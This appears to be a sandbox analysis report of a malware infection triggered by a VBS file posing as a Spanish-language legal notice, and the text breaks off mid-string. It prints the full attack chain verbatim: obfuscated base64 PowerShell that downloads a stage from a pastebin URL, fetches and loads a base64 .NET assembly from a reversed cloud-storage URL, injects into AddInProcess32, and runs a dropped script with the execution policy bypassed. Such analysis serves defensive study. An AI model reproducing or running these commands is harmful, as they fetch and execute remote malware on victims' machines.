C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,11964604837289643190,16487175661046232408,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2280 /prefetch:12⤵PID:1164
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2068,11964604837289643190,16487175661046232408,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6060 /prefetch:82⤵PID:1160
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,11964604837289643190,16487175661046232408,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4760 /prefetch:12⤵PID:112
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2068,11964604837289643190,16487175661046232408,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6376 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1764
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs"2⤵
- Checks computer location settings
PID:1412 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J☆Bq☆GI☆dQB0☆HE☆I☆☆9☆C☆☆Jw☆w☆Cc☆Ow☆k☆G8☆e☆Bq☆GI☆bw☆g☆D0☆I☆☆n☆CU☆c☆B6☆EE☆YwBP☆Gc☆SQBu☆E0☆cg☆l☆Cc☆OwBb☆FM☆eQBz☆HQ☆ZQBt☆C4☆TgBl☆HQ☆LgBT☆GU☆cgB2☆Gk☆YwBl☆F☆☆bwBp☆G4☆d☆BN☆GE☆bgBh☆Gc☆ZQBy☆F0☆Og☆6☆FM☆ZQBj☆HU☆cgBp☆HQ☆eQBQ☆HI☆bwB0☆G8☆YwBv☆Gw☆I☆☆9☆C☆☆WwBT☆Hk☆cwB0☆GU☆bQ☆u☆E4☆ZQB0☆C4☆UwBl☆GM☆dQBy☆Gk☆d☆B5☆F☆☆cgBv☆HQ☆bwBj☆G8☆b☆BU☆Hk☆c☆Bl☆F0☆Og☆6☆FQ☆b☆Bz☆DE☆Mg☆7☆CQ☆U☆B4☆EU☆T☆BY☆C☆☆PQ☆g☆Cc☆a☆B0☆HQ☆c☆Bz☆Do☆Lw☆v☆H☆☆YQBz☆HQ☆ZQBi☆Gk☆bg☆u☆GM☆bwBt☆C8☆cgBh☆Hc☆LwBB☆GQ☆dg☆5☆Gc☆QgBI☆GE☆Jw☆7☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆PQ☆g☆Cg☆TgBl☆Hc☆LQBP☆GI☆agBl☆GM☆d☆☆g☆E4☆ZQB0☆C4☆VwBl☆GI☆QwBs☆Gk☆ZQBu☆HQ☆KQ☆u☆EQ☆bwB3☆G4☆b☆Bv☆GE☆Z☆BT☆HQ☆cgBp☆G4☆Zw☆o☆C☆☆J☆BQ☆Hg☆RQBM☆Fg☆I☆☆g☆Ck☆Ow☆k☆FI☆QwBr☆FY☆Sg☆g☆D0☆I☆☆o☆E4☆ZQB3☆C0☆TwBi☆Go☆ZQBj☆HQ☆I☆BO☆GU☆d☆☆u☆Fc☆ZQBi☆EM☆b☆Bp☆GU☆bgB0☆Ck☆LgBE☆G8☆dwBu☆Gw☆bwBh☆GQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆KQ☆u☆HI☆ZQBw☆Gw☆YQBj☆GU☆K☆☆n☆CQ☆JQ☆n☆Cw☆JwBB☆Cc☆KQ☆7☆Fs☆QgB5☆HQ☆ZQBb☆F0☆XQ☆g☆CQ☆Z☆Bv☆HU☆bQBj☆C☆☆PQ☆g☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBD☆G8☆bgB2☆GU☆cgB0☆F0☆Og☆6☆EY☆cgBv☆G0☆QgBh☆HM☆ZQ☆2☆DQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆UgBD☆Gs☆VgBK☆C☆☆KQ☆7☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBB☆H☆☆c☆BE☆G8☆bQBh☆Gk☆bgBd☆Do☆OgBD☆HU☆cgBy☆GU☆bgB0☆EQ☆bwBt☆GE☆aQBu☆C4☆T☆Bv☆GE☆Z☆☆o☆CQ☆Z☆Bv☆HU☆bQBj☆Ck☆LgBH☆GU☆d☆BU☆Hk☆c☆Bl☆Cg☆JwBU☆GU☆a☆B1☆Gw☆YwBo☆GU☆cwBY☆Hg☆W☆B4☆Hg☆LgBD☆Gw☆YQBz☆HM☆MQ☆n☆Ck☆LgBH☆GU☆d☆BN☆GU☆d☆Bo☆G8☆Z☆☆o☆Cc☆TQBz☆HE☆QgBJ☆GI☆WQ☆n☆Ck☆LgBJ☆G4☆dgBv☆Gs☆ZQ☆o☆CQ☆bgB1☆Gw☆b☆☆s☆C☆☆WwBv☆GI☆agBl☆GM☆d☆Bb☆F0☆XQ☆g☆Cg☆Jw☆w☆GM☆M☆Bi☆GM☆YwBh☆DU☆YgBh☆GI☆ZQ☆t☆Dg☆NQ☆2☆GE☆LQ☆4☆DE☆Mg☆0☆C0☆Mw☆3☆DI☆Ng☆t☆DY☆Yw☆0☆Dc☆Ng☆3☆DE☆Ng☆9☆G4☆ZQBr☆G8☆d☆☆m☆GE☆aQBk☆GU☆bQ☆9☆HQ☆b☆Bh☆D8☆d☆B4☆HQ☆Lg☆0☆DI☆M☆☆y☆C0☆M☆☆x☆C0☆Ng☆x☆FQ☆QQBS☆EM☆R☆☆v☆G8☆LwBt☆G8☆Yw☆u☆HQ☆bwBw☆HM☆c☆Bw☆GE☆LgBv☆GM☆aQBu☆G8☆cgB0☆GM☆ZQBs☆GU☆LQBv☆HQ☆bgBl☆G0☆dQBj☆G8☆Z☆☆v☆GI☆Lw☆w☆HY☆LwBt☆G8☆Yw☆u☆HM☆aQBw☆GE☆ZQBs☆Gc☆bwBv☆Gc☆LgBl☆Gc☆YQBy☆G8☆d☆Bz☆GU☆cwBh☆GI☆ZQBy☆Gk☆Zg☆v☆C8☆OgBz☆H☆☆d☆B0☆Gg☆Jw☆g☆Cw☆I☆☆k☆G8☆e☆Bq☆GI☆bw☆g☆Cw☆I☆☆n☆GE☆bQBi☆Gc☆eQBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆C0☆LQ☆t☆C0☆LQ☆t☆C0☆Jw☆s☆C☆☆J☆Bq☆GI☆dQB0☆HE☆L☆☆g☆Cc☆MQ☆n☆Cw☆I☆☆n☆FI☆bwBk☆GE☆Jw☆g☆Ck☆KQ☆7☆☆==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('☆','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs');powershell $KByHL;3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3192 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$jbutq = '0';$oxjbo = 'C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs';[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$PxELX = 'https://pastebin.com/raw/Adv9gBHa';$IHpLq = (New-Object Net.WebClient).DownloadString( $PxELX );$RCkVJ = (New-Object Net.WebClient).DownloadString( $IHpLq ).replace('$%','A');[Byte[]] $doumc = [system.Convert]::FromBase64String( $RCkVJ );[system.AppDomain]::CurrentDomain.Load($doumc).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0c0bcca5babe-856a-8124-3726-6c476716=nekot&aidem=tla?txt.4202-01-61TARCD/o/moc.topsppa.ocinortcele-otnemucod/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $oxjbo , 'ambgy_________________________-------', $jbutq, '1', 'Roda' ));"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3200 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"5⤵
- System Location Discovery: System Language Discovery
PID:5604
-
-
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs"2⤵
- Checks computer location settings
PID:4964 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J☆Bq☆GI☆dQB0☆HE☆I☆☆9☆C☆☆Jw☆w☆Cc☆Ow☆k☆G8☆e☆Bq☆GI☆bw☆g☆D0☆I☆☆n☆CU☆c☆B6☆EE☆YwBP☆Gc☆SQBu☆E0☆cg☆l☆Cc☆OwBb☆FM☆eQBz☆HQ☆ZQBt☆C4☆TgBl☆HQ☆LgBT☆GU☆cgB2☆Gk☆YwBl☆F☆☆bwBp☆G4☆d☆BN☆GE☆bgBh☆Gc☆ZQBy☆F0☆Og☆6☆FM☆ZQBj☆HU☆cgBp☆HQ☆eQBQ☆HI☆bwB0☆G8☆YwBv☆Gw☆I☆☆9☆C☆☆WwBT☆Hk☆cwB0☆GU☆bQ☆u☆E4☆ZQB0☆C4☆UwBl☆GM☆dQBy☆Gk☆d☆B5☆F☆☆cgBv☆HQ☆bwBj☆G8☆b☆BU☆Hk☆c☆Bl☆F0☆Og☆6☆FQ☆b☆Bz☆DE☆Mg☆7☆CQ☆U☆B4☆EU☆T☆BY☆C☆☆PQ☆g☆Cc☆a☆B0☆HQ☆c☆Bz☆Do☆Lw☆v☆H☆☆YQBz☆HQ☆ZQBi☆Gk☆bg☆u☆GM☆bwBt☆C8☆cgBh☆Hc☆LwBB☆GQ☆dg☆5☆Gc☆QgBI☆GE☆Jw☆7☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆PQ☆g☆Cg☆TgBl☆Hc☆LQBP☆GI☆agBl☆GM☆d☆☆g☆E4☆ZQB0☆C4☆VwBl☆GI☆QwBs☆Gk☆ZQBu☆HQ☆KQ☆u☆EQ☆bwB3☆G4☆b☆Bv☆GE☆Z☆BT☆HQ☆cgBp☆G4☆Zw☆o☆C☆☆J☆BQ☆Hg☆RQBM☆Fg☆I☆☆g☆Ck☆Ow☆k☆FI☆QwBr☆FY☆Sg☆g☆D0☆I☆☆o☆E4☆ZQB3☆C0☆TwBi☆Go☆ZQBj☆HQ☆I☆BO☆GU☆d☆☆u☆Fc☆ZQBi☆EM☆b☆Bp☆GU☆bgB0☆Ck☆LgBE☆G8☆dwBu☆Gw☆bwBh☆GQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆KQ☆u☆HI☆ZQBw☆Gw☆YQBj☆GU☆K☆☆n☆CQ☆JQ☆n☆Cw☆JwBB☆Cc☆KQ☆7☆Fs☆QgB5☆HQ☆ZQBb☆F0☆XQ☆g☆CQ☆Z☆Bv☆HU☆bQBj☆C☆☆PQ☆g☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBD☆G8☆bgB2☆GU☆cgB0☆F0☆Og☆6☆EY☆cgBv☆G0☆QgBh☆HM☆ZQ☆2☆DQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆UgBD☆Gs☆VgBK☆C☆☆KQ☆7☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBB☆H☆☆c☆BE☆G8☆bQBh☆Gk☆bgBd☆Do☆OgBD☆HU☆cgBy☆GU☆bgB0☆EQ☆bwBt☆GE☆aQBu☆C4☆T☆Bv☆GE☆Z☆☆o☆CQ☆Z☆Bv☆HU☆bQBj☆Ck☆LgBH☆GU☆d☆BU☆Hk☆c☆Bl☆Cg☆JwBU☆GU☆a☆B1☆Gw☆YwBo☆GU☆cwBY☆Hg☆W☆B4☆Hg☆LgBD☆Gw☆YQBz☆HM☆MQ☆n☆Ck☆LgBH☆GU☆d☆BN☆GU☆d☆Bo☆G8☆Z☆☆o☆Cc☆TQBz☆HE☆QgBJ☆GI☆WQ☆n☆Ck☆LgBJ☆G4☆dgBv☆Gs☆ZQ☆o☆CQ☆bgB1☆Gw☆b☆☆s☆C☆☆WwBv☆GI☆agBl☆GM☆d☆Bb☆F0☆XQ☆g☆Cg☆Jw☆w☆GM☆M☆Bi☆GM☆YwBh☆DU☆YgBh☆GI☆ZQ☆t☆Dg☆NQ☆2☆GE☆LQ☆4☆DE☆Mg☆0☆C0☆Mw☆3☆DI☆Ng☆t☆DY☆Yw☆0☆Dc☆Ng☆3☆DE☆Ng☆9☆G4☆ZQBr☆G8☆d☆☆m☆GE☆aQBk☆GU☆bQ☆9☆HQ☆b☆Bh☆D8☆d☆B4☆HQ☆Lg☆0☆DI☆M☆☆y☆C0☆M☆☆x☆C0☆Ng☆x☆FQ☆QQBS☆EM☆R☆☆v☆G8☆LwBt☆G8☆Yw☆u☆HQ☆bwBw☆HM☆c☆Bw☆GE☆LgBv☆GM☆aQBu☆G8☆cgB0☆GM☆ZQBs☆GU☆LQBv☆HQ☆bgBl☆G0☆dQBj☆G8☆Z☆☆v☆GI☆Lw☆w☆HY☆LwBt☆G8☆Yw☆u☆HM☆aQBw☆GE☆ZQBs☆Gc☆bwBv☆Gc☆LgBl☆Gc☆YQBy☆G8☆d☆Bz☆GU☆cwBh☆GI☆ZQBy☆Gk☆Zg☆v☆C8☆OgBz☆H☆☆d☆B0☆Gg☆Jw☆g☆Cw☆I☆☆k☆G8☆e☆Bq☆GI☆bw☆g☆Cw☆I☆☆n☆GE☆bQBi☆Gc☆eQBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆C0☆LQ☆t☆C0☆LQ☆t☆C0☆Jw☆s☆C☆☆J☆Bq☆GI☆dQB0☆HE☆L☆☆g☆Cc☆MQ☆n☆Cw☆I☆☆n☆FI☆bwBk☆GE☆Jw☆g☆Ck☆KQ☆7☆☆==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('☆','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs');powershell $KByHL;3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1700 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$jbutq = '0';$oxjbo = 'C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs';[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$PxELX = 'https://pastebin.com/raw/Adv9gBHa';$IHpLq = (New-Object Net.WebClient).DownloadString( $PxELX );$RCkVJ = (New-Object Net.WebClient).DownloadString( $IHpLq ).replace('$%','A');[Byte[]] $doumc = [system.Convert]::FromBase64String( $RCkVJ );[system.AppDomain]::CurrentDomain.Load($doumc).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0c0bcca5babe-856a-8124-3726-6c476716=nekot&aidem=tla?txt.4202-01-61TARCD/o/moc.topsppa.ocinortcele-otnemucod/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $oxjbo , 'ambgy_________________________-------', $jbutq, '1', 'Roda' ));"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:208 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"5⤵
- System Location Discovery: System Language Discovery
PID:5540
-
-
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs"2⤵
- Checks computer location settings
PID:400 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J☆Bq☆GI☆dQB0☆HE☆I☆☆9☆C☆☆Jw☆w☆Cc☆Ow☆k☆G8☆e☆Bq☆GI☆bw☆g☆D0☆I☆☆n☆CU☆c☆B6☆EE☆YwBP☆Gc☆SQBu☆E0☆cg☆l☆Cc☆OwBb☆FM☆eQBz☆HQ☆ZQBt☆C4☆TgBl☆HQ☆LgBT☆GU☆cgB2☆Gk☆YwBl☆F☆☆bwBp☆G4☆d☆BN☆GE☆bgBh☆Gc☆ZQBy☆F0☆Og☆6☆FM☆ZQBj☆HU☆cgBp☆HQ☆eQBQ☆HI☆bwB0☆G8☆YwBv☆Gw☆I☆☆9☆C☆☆WwBT☆Hk☆cwB0☆GU☆bQ☆u☆E4☆ZQB0☆C4☆UwBl☆GM☆dQBy☆Gk☆d☆B5☆F☆☆cgBv☆HQ☆bwBj☆G8☆b☆BU☆Hk☆c☆Bl☆F0☆Og☆6☆FQ☆b☆Bz☆DE☆Mg☆7☆CQ☆U☆B4☆EU☆T☆BY☆C☆☆PQ☆g☆Cc☆a☆B0☆HQ☆c☆Bz☆Do☆Lw☆v☆H☆☆YQBz☆HQ☆ZQBi☆Gk☆bg☆u☆GM☆bwBt☆C8☆cgBh☆Hc☆LwBB☆GQ☆dg☆5☆Gc☆QgBI☆GE☆Jw☆7☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆PQ☆g☆Cg☆TgBl☆Hc☆LQBP☆GI☆agBl☆GM☆d☆☆g☆E4☆ZQB0☆C4☆VwBl☆GI☆QwBs☆Gk☆ZQBu☆HQ☆KQ☆u☆EQ☆bwB3☆G4☆b☆Bv☆GE☆Z☆BT☆HQ☆cgBp☆G4☆Zw☆o☆C☆☆J☆BQ☆Hg☆RQBM☆Fg☆I☆☆g☆Ck☆Ow☆k☆FI☆QwBr☆FY☆Sg☆g☆D0☆I☆☆o☆E4☆ZQB3☆C0☆TwBi☆Go☆ZQBj☆HQ☆I☆BO☆GU☆d☆☆u☆Fc☆ZQBi☆EM☆b☆Bp☆GU☆bgB0☆Ck☆LgBE☆G8☆dwBu☆Gw☆bwBh☆GQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆KQ☆u☆HI☆ZQBw☆Gw☆YQBj☆GU☆K☆☆n☆CQ☆JQ☆n☆Cw☆JwBB☆Cc☆KQ☆7☆Fs☆QgB5☆HQ☆ZQBb☆F0☆XQ☆g☆CQ☆Z☆Bv☆HU☆bQBj☆C☆☆PQ☆g☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBD☆G8☆bgB2☆GU☆cgB0☆F0☆Og☆6☆EY☆cgBv☆G0☆QgBh☆HM☆ZQ☆2☆DQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆UgBD☆Gs☆VgBK☆C☆☆KQ☆7☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBB☆H☆☆c☆BE☆G8☆bQBh☆Gk☆bgBd☆Do☆OgBD☆HU☆cgBy☆GU☆bgB0☆EQ☆bwBt☆GE☆aQBu☆C4☆T☆Bv☆GE☆Z☆☆o☆CQ☆Z☆Bv☆HU☆bQBj☆Ck☆LgBH☆GU☆d☆BU☆Hk☆c☆Bl☆Cg☆JwBU☆GU☆a☆B1☆Gw☆YwBo☆GU☆cwBY☆Hg☆W☆B4☆Hg☆LgBD☆Gw☆YQBz☆HM☆MQ☆n☆Ck☆LgBH☆GU☆d☆BN☆GU☆d☆Bo☆G8☆Z☆☆o☆Cc☆TQBz☆HE☆QgBJ☆GI☆WQ☆n☆Ck☆LgBJ☆G4☆dgBv☆Gs☆ZQ☆o☆CQ☆bgB1☆Gw☆b☆☆s☆C☆☆WwBv☆GI☆agBl☆GM☆d☆Bb☆F0☆XQ☆g☆Cg☆Jw☆w☆GM☆M☆Bi☆GM☆YwBh☆DU☆YgBh☆GI☆ZQ☆t☆Dg☆NQ☆2☆GE☆LQ☆4☆DE☆Mg☆0☆C0☆Mw☆3☆DI☆Ng☆t☆DY☆Yw☆0☆Dc☆Ng☆3☆DE☆Ng☆9☆G4☆ZQBr☆G8☆d☆☆m☆GE☆aQBk☆GU☆bQ☆9☆HQ☆b☆Bh☆D8☆d☆B4☆HQ☆Lg☆0☆DI☆M☆☆y☆C0☆M☆☆x☆C0☆Ng☆x☆FQ☆QQBS☆EM☆R☆☆v☆G8☆LwBt☆G8☆Yw☆u☆HQ☆bwBw☆HM☆c☆Bw☆GE☆LgBv☆GM☆aQBu☆G8☆cgB0☆GM☆ZQBs☆GU☆LQBv☆HQ☆bgBl☆G0☆dQBj☆G8☆Z☆☆v☆GI☆Lw☆w☆HY☆LwBt☆G8☆Yw☆u☆HM☆aQBw☆GE☆ZQBs☆Gc☆bwBv☆Gc☆LgBl☆Gc☆YQBy☆G8☆d☆Bz☆GU☆cwBh☆GI☆ZQBy☆Gk☆Zg☆v☆C8☆OgBz☆H☆☆d☆B0☆Gg☆Jw☆g☆Cw☆I☆☆k☆G8☆e☆Bq☆GI☆bw☆g☆Cw☆I☆☆n☆GE☆bQBi☆Gc☆eQBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆C0☆LQ☆t☆C0☆LQ☆t☆C0☆Jw☆s☆C☆☆J☆Bq☆GI☆dQB0☆HE☆L☆☆g☆Cc☆MQ☆n☆Cw☆I☆☆n☆FI☆bwBk☆GE☆Jw☆g☆Ck☆KQ☆7☆☆==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('☆','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs');powershell $KByHL;3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3160 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$jbutq = '0';$oxjbo = 'C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs';[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$PxELX = 'https://pastebin.com/raw/Adv9gBHa';$IHpLq = (New-Object Net.WebClient).DownloadString( $PxELX );$RCkVJ = (New-Object Net.WebClient).DownloadString( $IHpLq ).replace('$%','A');[Byte[]] $doumc = [system.Convert]::FromBase64String( $RCkVJ );[system.AppDomain]::CurrentDomain.Load($doumc).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0c0bcca5babe-856a-8124-3726-6c476716=nekot&aidem=tla?txt.4202-01-61TARCD/o/moc.topsppa.ocinortcele-otnemucod/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $oxjbo , 'ambgy_________________________-------', $jbutq, '1', 'Roda' ));"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1600 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5644 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\asin10-10-2024.vbs"' & exit6⤵
- System Location Discovery: System Language Discovery
PID:5236 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\asin10-10-2024.vbs"'7⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4524 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\asin10-10-2024.vbs"8⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:4972 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J☆Bu☆GE☆b☆Bl☆G0☆I☆☆9☆C☆☆Jw☆w☆Cc☆Ow☆k☆GU☆awBo☆HU☆a☆☆g☆D0☆I☆☆n☆CU☆c☆B6☆EE☆YwBP☆Gc☆SQBu☆E0☆cg☆l☆Cc☆OwBb☆FM☆eQBz☆HQ☆ZQBt☆C4☆TgBl☆HQ☆LgBT☆GU☆cgB2☆Gk☆YwBl☆F☆☆bwBp☆G4☆d☆BN☆GE☆bgBh☆Gc☆ZQBy☆F0☆Og☆6☆FM☆ZQBj☆HU☆cgBp☆HQ☆eQBQ☆HI☆bwB0☆G8☆YwBv☆Gw☆I☆☆9☆C☆☆WwBT☆Hk☆cwB0☆GU☆bQ☆u☆E4☆ZQB0☆C4☆UwBl☆GM☆dQBy☆Gk☆d☆B5☆F☆☆cgBv☆HQ☆bwBj☆G8☆b☆BU☆Hk☆c☆Bl☆F0☆Og☆6☆FQ☆b☆Bz☆DE☆Mg☆7☆CQ☆U☆B4☆EU☆T☆BY☆C☆☆PQ☆g☆Cc☆a☆B0☆HQ☆c☆Bz☆Do☆Lw☆v☆H☆☆YQBz☆HQ☆ZQBi☆Gk☆bg☆u☆GM☆bwBt☆C8☆cgBh☆Hc☆LwBB☆GQ☆dg☆5☆Gc☆QgBI☆GE☆Jw☆7☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆PQ☆g☆Cg☆TgBl☆Hc☆LQBP☆GI☆agBl☆GM☆d☆☆g☆E4☆ZQB0☆C4☆VwBl☆GI☆QwBs☆Gk☆ZQBu☆HQ☆KQ☆u☆EQ☆bwB3☆G4☆b☆Bv☆GE☆Z☆BT☆HQ☆cgBp☆G4☆Zw☆o☆C☆☆J☆BQ☆Hg☆RQBM☆Fg☆I☆☆g☆Ck☆Ow☆k☆FI☆QwBr☆FY☆Sg☆g☆D0☆I☆☆o☆E4☆ZQB3☆C0☆TwBi☆Go☆ZQBj☆HQ☆I☆BO☆GU☆d☆☆u☆Fc☆ZQBi☆EM☆b☆Bp☆GU☆bgB0☆Ck☆LgBE☆G8☆dwBu☆Gw☆bwBh☆GQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆KQ☆u☆HI☆ZQBw☆Gw☆YQBj☆GU☆K☆☆n☆CQ☆JQ☆n☆Cw☆JwBB☆Cc☆KQ☆7☆Fs☆QgB5☆HQ☆ZQBb☆F0☆XQ☆g☆CQ☆aQBy☆GQ☆awB0☆C☆☆PQ☆g☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBD☆G8☆bgB2☆GU☆cgB0☆F0☆Og☆6☆EY☆cgBv☆G0☆QgBh☆HM☆ZQ☆2☆DQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆UgBD☆Gs☆VgBK☆C☆☆KQ☆7☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBB☆H☆☆c☆BE☆G8☆bQBh☆Gk☆bgBd☆Do☆OgBD☆HU☆cgBy☆GU☆bgB0☆EQ☆bwBt☆GE☆aQBu☆C4☆T☆Bv☆GE☆Z☆☆o☆CQ☆aQBy☆GQ☆awB0☆Ck☆LgBH☆GU☆d☆BU☆Hk☆c☆Bl☆Cg☆JwBU☆GU☆a☆B1☆Gw☆YwBo☆GU☆cwBY☆Hg☆W☆B4☆Hg☆LgBD☆Gw☆YQBz☆HM☆MQ☆n☆Ck☆LgBH☆GU☆d☆BN☆GU☆d☆Bo☆G8☆Z☆☆o☆Cc☆TQBz☆HE☆QgBJ☆GI☆WQ☆n